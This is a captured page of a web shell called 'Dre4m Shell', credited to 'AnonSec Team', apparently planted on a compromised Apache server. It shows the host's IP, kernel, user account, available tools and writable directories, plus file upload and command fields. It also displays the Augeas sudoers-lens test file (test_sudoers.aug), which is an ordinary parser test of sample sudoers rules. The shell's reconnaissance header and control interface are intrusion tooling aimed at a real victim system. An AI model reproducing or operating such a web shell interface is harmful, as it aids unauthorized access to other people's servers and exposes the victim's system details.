Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.144.6.144
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/2/root/proc/2/task/2/root/usr/share/augeas/lenses/dist/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/2/root/proc/2/task/2/root/usr/share/augeas/lenses/dist/tests/test_sudoers.aug
(* Module: Test_sudoers *)
module Test_sudoers =

let test_user = [ label "user" . Sudoers.sto_to_com_user . Util.eol ]*

(* Test: test_user *)
test test_user get "root
@pbuilder
+secre-taries
@my\ admin\ group
EXAMPLE\\\\cslack
%ad.domain.com\\\\sudo-users
MY\ EX-AMPLE\ 9\\\\cslack\ group
" =
  { "user" = "root" }
  { "user" = "@pbuilder" }
  { "user" = "+secre-taries" }
  { "user" = "@my\\ admin\\ group" }
  { "user" = "EXAMPLE\\\\cslack" }
  { "user" = "%ad.domain.com\\\\sudo-users" }
  { "user" = "MY\\ EX-AMPLE\\ 9\\\\cslack\\ group" }

let conf = "
  Host_Alias LOCALNET = 192.168.0.0/24, localhost

   # User alias specification

User_Alias EXAMPLE_ADMINS = cslack, EXAMPLE\\\\cslack,\
          EXAMPLE\\\\jmalstrom

# Cmnd alias specification

Cmnd_Alias \
    DEBIAN_TOOLS \
    = \
    /usr/bin/apt-get,\
    /usr/bin/auto-get,   \
    /usr/bin/dpkg, /usr/bin/dselect, /usr/sbin/dpkg-reconfigure \
    : PBUILDER = /usr/sbin/pbuilder

   Cmnd_Alias ICAL = /bin/cat /home/rpinson/.kde/share/apps/korganizer/std.ics

	Defaults@LOCALNET        !lecture, \
   \t\t tty_tickets,!fqdn, !!env_reset

Defaults   !visiblepw

Defaults:buildd env_keep+=\"APT_CONFIG DEBIAN_FRONTEND SHELL\"
Defaults!PBUILDER env_keep+=\"HOME ARCH DIST DISTRIBUTION PDEBUILD_PBUILDER\"

# User privilege specification
root    ALL=(ALL) ALL
root    ALL=(: ALL) ALL
root    ALL=(ALL :ALL) ALL

# Members of the admin group may gain root privileges
%admin  ALL=(ALL) ALL, NOPASSWD  :	NOSETENV: \
   DEBIAN_TOOLS
%pbuilder       LOCALNET = NOPASSWD: PBUILDER
www-data +biglab=(rpinson)NOEXEC: ICAL \
        : \
        localhost = NOPASSWD: 	/usr/bin/test

	+secretaries           ALPHA = /usr/bin/su [!-]*, !/usr/bin/su *root*

@my\ admin\ group ALL=(root) NOPASSWD: /usr/bin/python /usr/local/sbin/filterlog -iu\\=www /var/log/something.log
#includedir /etc/sudoers.d
#include /etc/sudoers.d
@includedir /etc/sudoers.d
@include /etc/sudoers.file
"

   test Sudoers.lns get conf =
      {}
      { "Host_Alias"
          { "alias"
	      { "name" = "LOCALNET" }
              { "host" = "192.168.0.0/24" }
              { "host" = "localhost" } } }
      {}
      { "#comment" = "User alias specification" }
      {}
      { "User_Alias"
          { "alias"
              { "name" = "EXAMPLE_ADMINS" }
              { "user" = "cslack" }
              { "user" = "EXAMPLE\\\\cslack" }
              { "user" = "EXAMPLE\\\\jmalstrom" } } }
      {}
      { "#comment" = "Cmnd alias specification" }
      {}
      { "Cmnd_Alias"
          { "alias"
              { "name"    = "DEBIAN_TOOLS" }
              { "command" = "/usr/bin/apt-get" }
	      { "command" = "/usr/bin/auto-get" }
	      { "command" = "/usr/bin/dpkg" }
	      { "command" = "/usr/bin/dselect" }
	      { "command" = "/usr/sbin/dpkg-reconfigure" } }
          { "alias"
	      { "name" = "PBUILDER" }
              { "command" = "/usr/sbin/pbuilder" } } }
      {}
      { "Cmnd_Alias"
          { "alias"
	      { "name" = "ICAL" }
              { "command" = "/bin/cat /home/rpinson/.kde/share/apps/korganizer/std.ics" } } }
      {}
      { "Defaults"
          { "type"      = "@LOCALNET" }
	      { "lecture" { "negate" } }
          { "tty_tickets" }
          { "fqdn" { "negate" } }
          { "env_reset" } }
      {}
      { "Defaults"
          { "visiblepw" { "negate" } } }
      {}
      { "Defaults"
          { "type"      = ":buildd" }
	      { "env_keep"
              { "append" }
              { "var" = "APT_CONFIG" }
              { "var" = "DEBIAN_FRONTEND" }
              { "var" = "SHELL" } } }
      { "Defaults"
          { "type" = "!PBUILDER" }
          { "env_keep"
              { "append" }
              { "var" = "HOME" }
              { "var" = "ARCH" }
              { "var" = "DIST" }
              { "var" = "DISTRIBUTION" }
              { "var" = "PDEBUILD_PBUILDER" } } }
      {}
      { "#comment" = "User privilege specification" }
      { "spec"
          { "user" = "root" }
          { "host_group"
	      { "host" = "ALL" }
	      { "command" = "ALL"
	          { "runas_user"  = "ALL" } } } }
      { "spec"
          { "user" = "root" }
          { "host_group"
	      { "host" = "ALL" }
	      { "command" = "ALL"
            { "runas_group" = "ALL" } } } }
      { "spec"
          { "user" = "root" }
          { "host_group"
	      { "host" = "ALL" }
	      { "command" = "ALL"
	          { "runas_user"  = "ALL" }
            { "runas_group" = "ALL" } } } }
      {}
      { "#comment" = "Members of the admin group may gain root privileges" }
      { "spec"
          { "user"    = "%admin" }
	  { "host_group"
	      { "host" = "ALL" }
	      { "command" = "ALL"
	          { "runas_user" = "ALL" } }
	      { "command" = "DEBIAN_TOOLS"
		  { "tag"  = "NOPASSWD" }
		  { "tag"  = "NOSETENV" } } } }
      { "spec"
          { "user"    = "%pbuilder" }
	  { "host_group"
	      { "host" = "LOCALNET" }
	      { "command" = "PBUILDER"
	          { "tag" = "NOPASSWD" } } } }
      { "spec"
          { "user"    = "www-data" }
	  { "host_group"
	      { "host" = "+biglab" }
	      { "command" = "ICAL"
	          { "runas_user" = "rpinson" }
		  { "tag" = "NOEXEC" } } }
	  { "host_group"
	      { "host" = "localhost" }
	      { "command" = "/usr/bin/test"
	          { "tag" = "NOPASSWD" } } } }
      {}
      { "spec"
          { "user"    = "+secretaries" }
	  { "host_group"
	      { "host" = "ALPHA" }
	      { "command" = "/usr/bin/su [!-]*" }
	      { "command" = "/usr/bin/su *root*"
                  { "negate" } } } }
      {}
      { "spec"
          { "user"    = "@my\ admin\ group" }
          { "host_group"
              { "host" = "ALL" }
              { "command" = "/usr/bin/python /usr/local/sbin/filterlog -iu\\=www /var/log/something.log"
                  { "runas_user" = "root" }
                  { "tag" = "NOPASSWD" }
              }
          }
      }
      { "#includedir" = "/etc/sudoers.d" }
      { "#include" = "/etc/sudoers.d" }
      { "@includedir" = "/etc/sudoers.d" }
      { "@include" = "/etc/sudoers.file" }

test Sudoers.parameter_integer_bool
    put "umask = 022"
    after set "/umask/negate" ""  = "!umask"

test Sudoers.parameter_integer_bool
    put "!!!!!umask"
    after rm "/umask/negate"; set "/umask" "022" = "!!!!umask = 022"

test Sudoers.parameter_integer_bool put "!!!!umask = 022" after
    set "/umask/negate" "" = "!!!!!umask"

test Sudoers.parameter_integer_bool get "!!!umask = 022" = *

(* BZ 566134 *)

let s = "Defaults    secure_path = /sbin:/bin:/usr/sbin:/usr/bin\n"
test Sudoers.lns get s =
  { "Defaults"
    { "secure_path" = "/sbin:/bin:/usr/sbin:/usr/bin" } }

(* #724 - check timestamp_timeout is extracted OK if unsigned OR negative (-1) *)
test Sudoers.lns get "Defaults    timestamp_timeout = 3\n" =
  { "Defaults"
    { "timestamp_timeout" = "3" } }
test Sudoers.lns get "Defaults    timestamp_timeout = -1\n" =
  { "Defaults"
    { "timestamp_timeout" = "-1" } }

(* Ticket #206, comments at end of lines *)
let commenteol = "#
Defaults targetpw    # ask for
Host_Alias LOCALNET = 192.168.0.0/24   # foo eol
root    ALL=(ALL) ALL                  # all root\n"
test Sudoers.lns get commenteol =
  {}
  { "Defaults"
    { "targetpw" }
    { "#comment" = "ask for" } }
  { "Host_Alias"
      { "alias"
    { "name" = "LOCALNET" }
          { "host" = "192.168.0.0/24" } }
    { "#comment" = "foo eol" } }
  { "spec"
      { "user" = "root" }
      { "host_group"
    { "host" = "ALL" }
    { "command" = "ALL"
        { "runas_user"  = "ALL" } } }
    { "#comment" = "all root" } }

(* Allow = in commands *)
test Sudoers.spec get "root ALL= /usr/bin/mylvmbackup --configfile=/etc/mylvbackup_amanda.conf\n" =
  { "spec"
    { "user" = "root" }
    { "host_group"
      { "host" = "ALL" }
      { "command" = "/usr/bin/mylvmbackup --configfile=/etc/mylvbackup_amanda.conf" } } }

(* Allow commands without full path
   -- if they begin with a lowcase letter *)
test Sudoers.spec get "root ALL= sudoedit /etc/passwd\n" =
  { "spec"
    { "user" = "root" }
    { "host_group"
      { "host" = "ALL" }
      { "command" = "sudoedit /etc/passwd" } } }

(* Ticket #263, quoted values in defaults line *)
let defaults_spaces = "Defaults       passprompt=\"Your SecurID Passcode: \"\n"
test Sudoers.lns get defaults_spaces =
  { "Defaults"
    { "passprompt" = "\"Your SecurID Passcode: \"" }
  }

(* Ticket #263, quoted values in defaults line (string/bool parameters) *)
let defaults_spaces_strbool = "Defaults      mailfrom=\"root@example.com\"\n"
test Sudoers.lns get defaults_spaces_strbool =
  { "Defaults"
    { "mailfrom" = "\"root@example.com\"" }
  }

(* Test: Sudoers.spec
     Spec users can be aliases *)
test Sudoers.spec get "APACHE_ADMIN ALL= ALL\n" =
  { "spec"
    { "user" = "APACHE_ADMIN" }
    { "host_group"
      { "host" = "ALL" }
      { "command" = "ALL" } } }

(* Test: Sudoers.spec
     Ticket #337: allow period in user names *)
test Sudoers.spec get "user.one somehost = ALL\n" =
  { "spec"
    { "user" = "user.one" }
    { "host_group"
      { "host" = "somehost" }
      { "command" = "ALL" }
    }
  }

(* Test: Sudoers.spec
     Ticket #370: allow underscore in group names *)
test Sudoers.spec get "%sudo_users ALL=(ALL) ALL\n" =
  { "spec"
    { "user" = "%sudo_users" }
    { "host_group"
      { "host" = "ALL" }
      { "command" = "ALL"
        { "runas_user" = "ALL" } }
    }
  }

(* Test: Sudoers.spec
     allow ad group names with backslashes *)
test Sudoers.spec get "%ad.domain.com\\\\sudo-users ALL=(ALL) ALL\n" =
  { "spec"
    { "user" = "%ad.domain.com\\\\sudo-users" }
    { "host_group"
      { "host" = "ALL" }
      { "command" = "ALL"
        { "runas_user" = "ALL" } }
    }
  }

(* Test: Sudoers.spec
     Ticket #376: allow uppercase characters in user names *)
test Sudoers.spec get "%GrOup ALL = (ALL) ALL\n" =
  { "spec"
    { "user" = "%GrOup" }
    { "host_group"
      { "host" = "ALL" }
      { "command" = "ALL"
        { "runas_user" = "ALL" } }
    }
  }

(* Test: Sudoers.spec
     allow + in user-/groupnames *)
test Sudoers.spec get "group+user somehost = ALL\n" =
  { "spec"
    { "user" = "group+user" }
    { "host_group"
      { "host" = "somehost" }
      { "command" = "ALL" }
    }
  }

(* Test: Sudoers.spec
     GH #262:  Sudoers lens doesn't support `!` for command aliases *)
test Sudoers.spec get "%opssudoers ALL=(ALL) ALL, !!!BANNED\n" =
  { "spec"
    { "user" = "%opssudoers" }
    { "host_group"
      { "host" = "ALL" }
      { "command" = "ALL"
        { "runas_user" = "ALL" } }
      { "command" = "BANNED"
        { "negate" } }
    }
  }

(* Test: Sudoers.spec
     Handle multiple `!` properly in commands *)
test Sudoers.spec get "%opssudoers ALL=(ALL) ALL, !!!/bin/mount\n" =
  { "spec"
    { "user" = "%opssudoers" }
    { "host_group"
      { "host" = "ALL" }
      { "command" = "ALL"
        { "runas_user" = "ALL" } }
      { "command" = "/bin/mount"
        { "negate" } }
    }
  }

Anon7 - 2022
AnonSec Team